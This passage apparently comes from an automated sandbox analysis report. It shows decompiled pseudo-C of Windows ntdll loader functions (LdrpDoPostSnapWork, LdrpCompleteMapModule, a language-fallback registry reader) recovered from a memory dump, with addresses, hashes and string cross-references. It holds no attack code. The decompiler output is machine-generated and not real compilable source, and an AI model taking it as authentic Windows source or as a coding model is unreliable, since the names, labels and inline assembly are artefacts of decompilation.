				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E00AE934A() != 0) {
								_t159 = E00B5A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xbc5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00B55510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xbc5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E00AE849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E00AE8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E00AE8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xbc5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xbc5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E00AF2280(_t92, 0xbc86cc);
															_t94 = E00BA9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E00B061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xbc5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E00AE8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xbc5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xbc5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00B1F380(_t136, 0xab1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E00AF2280(_t108, 0xbc86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E00B061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00BA9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E00AEFFB0(_t118, _t156, 0xbc86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00B19A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                            0x00ae8799
                                                                                                            0x00ae879d
                                                                                                            0x00ae87a1
                                                                                                            0x00ae87a3
                                                                                                            0x00ae87a8
                                                                                                            0x00ae87c3
                                                                                                            0x00ae87c3
                                                                                                            0x00ae87c8
                                                                                                            0x00ae87d1
                                                                                                            0x00ae87d4
                                                                                                            0x00ae87d8
                                                                                                            0x00ae87e5
                                                                                                            0x00ae87ec
                                                                                                            0x00b39bfe
                                                                                                            0x00b39c00
                                                                                                            0x00b39c02
                                                                                                            0x00b39c08
                                                                                                            0x00b39c0d
                                                                                                            0x00b39c0f
                                                                                                            0x00b39c14
                                                                                                            0x00b39c2d
                                                                                                            0x00b39c32
                                                                                                            0x00b39c37
                                                                                                            0x00b39c3a
                                                                                                            0x00b39c3c
                                                                                                            0x00b39c42
                                                                                                            0x00b39c42
                                                                                                            0x00b39c3c
                                                                                                            0x00b39c02
                                                                                                            0x00ae87da
                                                                                                            0x00ae87df
                                                                                                            0x00ae87e3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae87e3
                                                                                                            0x00ae87f2
                                                                                                            0x00000000
                                                                                                            0x00ae87fb
                                                                                                            0x00ae87fd
                                                                                                            0x00ae87fe
                                                                                                            0x00ae880e
                                                                                                            0x00ae880f
                                                                                                            0x00ae8810
                                                                                                            0x00ae8814
                                                                                                            0x00ae881a
                                                                                                            0x00ae881c
                                                                                                            0x00ae881f
                                                                                                            0x00ae8821
                                                                                                            0x00ae8822
                                                                                                            0x00ae8824
                                                                                                            0x00ae8826
                                                                                                            0x00ae882c
                                                                                                            0x00ae882e
                                                                                                            0x00b39c48
                                                                                                            0x00b39c48
                                                                                                            0x00ae8834
                                                                                                            0x00ae8834
                                                                                                            0x00ae8837
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae8837
                                                                                                            0x00ae882e
                                                                                                            0x00ae883d
                                                                                                            0x00ae8840
                                                                                                            0x00ae8843
                                                                                                            0x00ae8846
                                                                                                            0x00ae8849
                                                                                                            0x00ae884c
                                                                                                            0x00ae884e
                                                                                                            0x00ae8850
                                                                                                            0x00ae8852
                                                                                                            0x00ae8854
                                                                                                            0x00ae8857
                                                                                                            0x00ae88b4
                                                                                                            0x00ae88b6
                                                                                                            0x00ae88b6
                                                                                                            0x00ae8859
                                                                                                            0x00ae8859
                                                                                                            0x00ae8859
                                                                                                            0x00ae8861
                                                                                                            0x00ae8866
                                                                                                            0x00ae886a
                                                                                                            0x00ae893d
                                                                                                            0x00ae8941
                                                                                                            0x00000000
                                                                                                            0x00ae8947
                                                                                                            0x00ae8947
                                                                                                            0x00ae894a
                                                                                                            0x00ae894c
                                                                                                            0x00000000
                                                                                                            0x00ae8952
                                                                                                            0x00ae8955
                                                                                                            0x00ae895a
                                                                                                            0x00ae895d
                                                                                                            0x00ae895d
                                                                                                            0x00ae895f
                                                                                                            0x00ae8961
                                                                                                            0x00ae8961
                                                                                                            0x00ae8968
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae896a
                                                                                                            0x00ae896b
                                                                                                            0x00ae896e
                                                                                                            0x00000000
                                                                                                            0x00ae8970
                                                                                                            0x00ae8970
                                                                                                            0x00ae8970
                                                                                                            0x00ae8970
                                                                                                            0x00ae8972
                                                                                                            0x00ae8972
                                                                                                            0x00ae8974
                                                                                                            0x00000000
                                                                                                            0x00ae897a
                                                                                                            0x00ae897a
                                                                                                            0x00ae897d
                                                                                                            0x00000000
                                                                                                            0x00ae8983
                                                                                                            0x00b39c65
                                                                                                            0x00b39c6d
                                                                                                            0x00b39c72
                                                                                                            0x00b39c75
                                                                                                            0x00b39c75
                                                                                                            0x00b39c82
                                                                                                            0x00b39c86
                                                                                                            0x00b39c87
                                                                                                            0x00b39c88
                                                                                                            0x00b39c89
                                                                                                            0x00b39c8c
                                                                                                            0x00b39c90
                                                                                                            0x00b39c95
                                                                                                            0x00b39c97
                                                                                                            0x00b39ca0
                                                                                                            0x00b39ca3
                                                                                                            0x00b39ca9
                                                                                                            0x00b39ca9
                                                                                                            0x00000000
                                                                                                            0x00b39ca9
                                                                                                            0x00b39ca3
                                                                                                            0x00000000
                                                                                                            0x00b39c97
                                                                                                            0x00ae897d
                                                                                                            0x00000000
                                                                                                            0x00ae8974
                                                                                                            0x00ae8988
                                                                                                            0x00ae8992
                                                                                                            0x00ae8996
                                                                                                            0x00000000
                                                                                                            0x00ae8996
                                                                                                            0x00ae894c
                                                                                                            0x00000000
                                                                                                            0x00ae8870
                                                                                                            0x00ae887b
                                                                                                            0x00ae887d
                                                                                                            0x00ae887f
                                                                                                            0x00ae8881
                                                                                                            0x00ae8884
                                                                                                            0x00ae8884
                                                                                                            0x00ae8886
                                                                                                            0x00ae8889
                                                                                                            0x00ae888c
                                                                                                            0x00ae888e
                                                                                                            0x00ae8891
                                                                                                            0x00ae8891
                                                                                                            0x00ae8898
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae889a
                                                                                                            0x00ae889b
                                                                                                            0x00ae889e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae88a0
                                                                                                            0x00ae88a8
                                                                                                            0x00ae88b0
                                                                                                            0x00ae88b2
                                                                                                            0x00ae88d3
                                                                                                            0x00ae88d5
                                                                                                            0x00000000
                                                                                                            0x00ae88d7
                                                                                                            0x00ae88db
                                                                                                            0x00ae88dc
                                                                                                            0x00ae88e0
                                                                                                            0x00ae88e8
                                                                                                            0x00ae88ee
                                                                                                            0x00ae88f0
                                                                                                            0x00ae88f3
                                                                                                            0x00ae88fc
                                                                                                            0x00ae8901
                                                                                                            0x00ae8906
                                                                                                            0x00ae890c
                                                                                                            0x00ae890c
                                                                                                            0x00ae890f
                                                                                                            0x00ae8916
                                                                                                            0x00ae8917
                                                                                                            0x00ae8918
                                                                                                            0x00ae8919
                                                                                                            0x00ae891a
                                                                                                            0x00ae891f
                                                                                                            0x00ae8921
                                                                                                            0x00b39c52
                                                                                                            0x00b39c55
                                                                                                            0x00b39c5b
                                                                                                            0x00b39cac
                                                                                                            0x00b39cc0
                                                                                                            0x00b39cc0
                                                                                                            0x00b39c55
                                                                                                            0x00ae8927
                                                                                                            0x00ae8927
                                                                                                            0x00ae892f
                                                                                                            0x00ae8933
                                                                                                            0x00000000
                                                                                                            0x00ae88f5
                                                                                                            0x00ae88f5
                                                                                                            0x00000000
                                                                                                            0x00ae88f7
                                                                                                            0x00ae88f7
                                                                                                            0x00ae88fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae88fa
                                                                                                            0x00ae88f5
                                                                                                            0x00ae88f3
                                                                                                            0x00000000
                                                                                                            0x00ae88d5
                                                                                                            0x00000000
                                                                                                            0x00ae88b2
                                                                                                            0x00ae88c9
                                                                                                            0x00000000
                                                                                                            0x00ae88c9
                                                                                                            0x00ae887f
                                                                                                            0x00ae886a
                                                                                                            0x00ae8857
                                                                                                            0x00ae8852
                                                                                                            0x00ae88bf
                                                                                                            0x00ae88bf
                                                                                                            0x00ae87aa
                                                                                                            0x00ae87ad
                                                                                                            0x00ae87ae
                                                                                                            0x00ae87b4
                                                                                                            0x00ae87b5
                                                                                                            0x00ae87b6
                                                                                                            0x00ae87b8
                                                                                                            0x00ae87bd
                                                                                                            0x00ae87c1
                                                                                                            0x00ae87f4
                                                                                                            0x00ae87fa
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae87c1
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 00B39C28
                                                                                                            • LdrpDoPostSnapWork, xrefs: 00B39C1E
                                                                                                            • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00B39C18
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID: InitializeThunk
                                                                                                            • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                            • API String ID: 2994545307-1948996284
                                                                                                            • Opcode ID: ab19fd57da1b5b534881574e9611cfee1507b808c6dc9f3c108b38fe44309905
                                                                                                            • Instruction ID: bb441ea7b8a8e3c95b751f1fea5719857b7b8ffaf0b17987325d8ea9895f0d0c
                                                                                                            • Opcode Fuzzy Hash: ab19fd57da1b5b534881574e9611cfee1507b808c6dc9f3c108b38fe44309905
                                                                                                            • Instruction Fuzzy Hash: 0891F231A00256AFDF18DF5AC981ABAB7F5FF44340BA441A9EC09AB251DF74ED41CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00AE7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E00AE7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00AECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00ADC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xbc5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00B55510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xbc5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00AF7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AF7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00B57016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00AF7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00AF7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00B57016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00B0A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00ADB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                                            0x00ae7e4c
                                                                                                            0x00ae7e50
                                                                                                            0x00ae7e55
                                                                                                            0x00ae7e58
                                                                                                            0x00ae7e5d
                                                                                                            0x00ae7e71
                                                                                                            0x00ae7f33
                                                                                                            0x00ae7e77
                                                                                                            0x00ae7e77
                                                                                                            0x00ae7e79
                                                                                                            0x00ae7e79
                                                                                                            0x00ae7e7e
                                                                                                            0x00ae7f45
                                                                                                            0x00b39848
                                                                                                            0x00000000
                                                                                                            0x00b39848
                                                                                                            0x00ae7f4e
                                                                                                            0x00ae7f53
                                                                                                            0x00ae7f5a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b3985a
                                                                                                            0x00b39862
                                                                                                            0x00b39866
                                                                                                            0x00000000
                                                                                                            0x00b3986c
                                                                                                            0x00000000
                                                                                                            0x00b3986c
                                                                                                            0x00ae7e84
                                                                                                            0x00ae7e84
                                                                                                            0x00ae7e8d
                                                                                                            0x00b39871
                                                                                                            0x00ae7eb8
                                                                                                            0x00ae7ec0
                                                                                                            0x00ae7ec0
                                                                                                            0x00ae7e9a
                                                                                                            0x00b3987e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00b39884
                                                                                                            0x00b3988b
                                                                                                            0x00b398a7
                                                                                                            0x00b398ac
                                                                                                            0x00b398b1
                                                                                                            0x00b398b6
                                                                                                            0x00b398b8
                                                                                                            0x00b398b8
                                                                                                            0x00b398b9
                                                                                                            0x00000000
                                                                                                            0x00b398b9
                                                                                                            0x00ae7ea0
                                                                                                            0x00ae7ea7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae7eac
                                                                                                            0x00ae7eb1
                                                                                                            0x00ae7ec6
                                                                                                            0x00ae7ed0
                                                                                                            0x00b398cc
                                                                                                            0x00ae7ed6
                                                                                                            0x00ae7ed6
                                                                                                            0x00ae7ed6
                                                                                                            0x00ae7ede
                                                                                                            0x00ae7ee3
                                                                                                            0x00b398e3
                                                                                                            0x00b398f0
                                                                                                            0x00b39902
                                                                                                            0x00b398f2
                                                                                                            0x00b398fb
                                                                                                            0x00b398fb
                                                                                                            0x00b39907
                                                                                                            0x00b3991d
                                                                                                            0x00b3991d
                                                                                                            0x00b39907
                                                                                                            0x00b398e3
                                                                                                            0x00ae7ef0
                                                                                                            0x00ae7f14
                                                                                                            0x00ae7f14
                                                                                                            0x00ae7f1e
                                                                                                            0x00b39946
                                                                                                            0x00ae7f24
                                                                                                            0x00ae7f24
                                                                                                            0x00ae7f24
                                                                                                            0x00ae7f2c
                                                                                                            0x00b3996a
                                                                                                            0x00b39975
                                                                                                            0x00b39975
                                                                                                            0x00b3997e
                                                                                                            0x00b39993
                                                                                                            0x00b39993
                                                                                                            0x00b3997e
                                                                                                            0x00000000
                                                                                                            0x00ae7ef2
                                                                                                            0x00ae7efc
                                                                                                            0x00ae7f0a
                                                                                                            0x00ae7f0e
                                                                                                            0x00b39933
                                                                                                            0x00000000
                                                                                                            0x00b39933
                                                                                                            0x00000000
                                                                                                            0x00ae7f0e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ae7eb1

                                                                                                            Strings
                                                                                                            • LdrpCompleteMapModule, xrefs: 00B39898
                                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 00B398A2
                                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 00B39891
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.416446204.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                            • API String ID: 0-1676968949
                                                                                                            • Opcode ID: eeb26b836fe6fb344271d295d417c64672247e66c483dcd56461eb992d2fc559
                                                                                                            • Instruction ID: 2e88097701029e55b018d310ec9399e939077d237cfe210e989cddf823f5eda5
                                                                                                            • Opcode Fuzzy Hash: eeb26b836fe6fb344271d295d417c64672247e66c483dcd56461eb992d2fc559
                                                                                                            • Instruction Fuzzy Hash: D551F1316087859BEB22CB69C984B6E7BE4EF41710F6406D9F9519B3E2D770ED00CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00ADE620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 93%
                                                                                                            			E00ADE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00ADF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00B195D0();
						}
						if(_t78 != 0) {
							L00AF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00B1FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00B1BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00B19600();
					if(_t97 < 0) {
						goto L6;
					}
					E00B1BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00ADF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00B1BB40(_t83, _t102 + 0x24, _t78);
								if(L00AE43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00B1BB40(_t84, _t102 + 0x24, _t94);
									if(L00AE43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                                                                            0x00ade620
                                                                                                            0x00ade628
                                                                                                            0x00ade62f
                                                                                                            0x00ade631
                                                                                                            0x00ade635
                                                                                                            0x00ade637
                                                                                                            0x00ade63e
                                                                                                            0x00b35503
                                                                                                            0x00b35503
                                                                                                            0x00ade64c
                                                                                                            0x00ade64c
                                                                                                            0x00ade651
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ade661
                                                                                                            0x00ade665
                                                                                                            0x00b3542a
                                                                                                            0x00ade715
                                                                                                            0x00ade71a
                                                                                                            0x00ade71c
                                                                                                            0x00ade720
                                                                                                            0x00ade720
                                                                                                            0x00ade727
                                                                                                            0x00ade736
                                                                                                            0x00ade736
                                                                                                            0x00ade743
                                                                                                            0x00ade743
                                                                                                            0x00ade673
                                                                                                            0x00ade678
                                                                                                            0x00ade67d
                                                                                                            0x00ade682
                                                                                                            0x00ade685
                                                                                                            0x00ade692
                                                                                                            0x00ade69b
                                                                                                            0x00ade6a3
                                                                                                            0x00ade6ad
                                                                                                            0x00ade6b1
                                                                                                            0x00ade6b2
                                                                                                            0x00ade6bb
                                                                                                            0x00ade6bf
                                                                                                            0x00ade6c0
                                                                                                            0x00ade6c8
                                                                                                            0x00ade6cc
                                                                                                            0x00ade6d5
                                                                                                            0x00ade6d9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00ade6e5
                                                                                                            0x00ade6ea
                                                                                                            0x00ade6f9
                                                                                                            0x00ade70b
                                                                                                            0x00ade70f
                                                                                                            0x00b35439
                                                                                                            0x00b3545e
                                                                                                            0x00b3545e
                                                                                                            0x00000000
                                                                                                            0x00b3545e
                                                                                                            0x00b3543b
                                                                                                            0x00b3543e
                                                                                                            0x00b35440
                                                                                                            0x00b35445
                                                                                                            0x00b35472
                                                                                                            0x00b35475
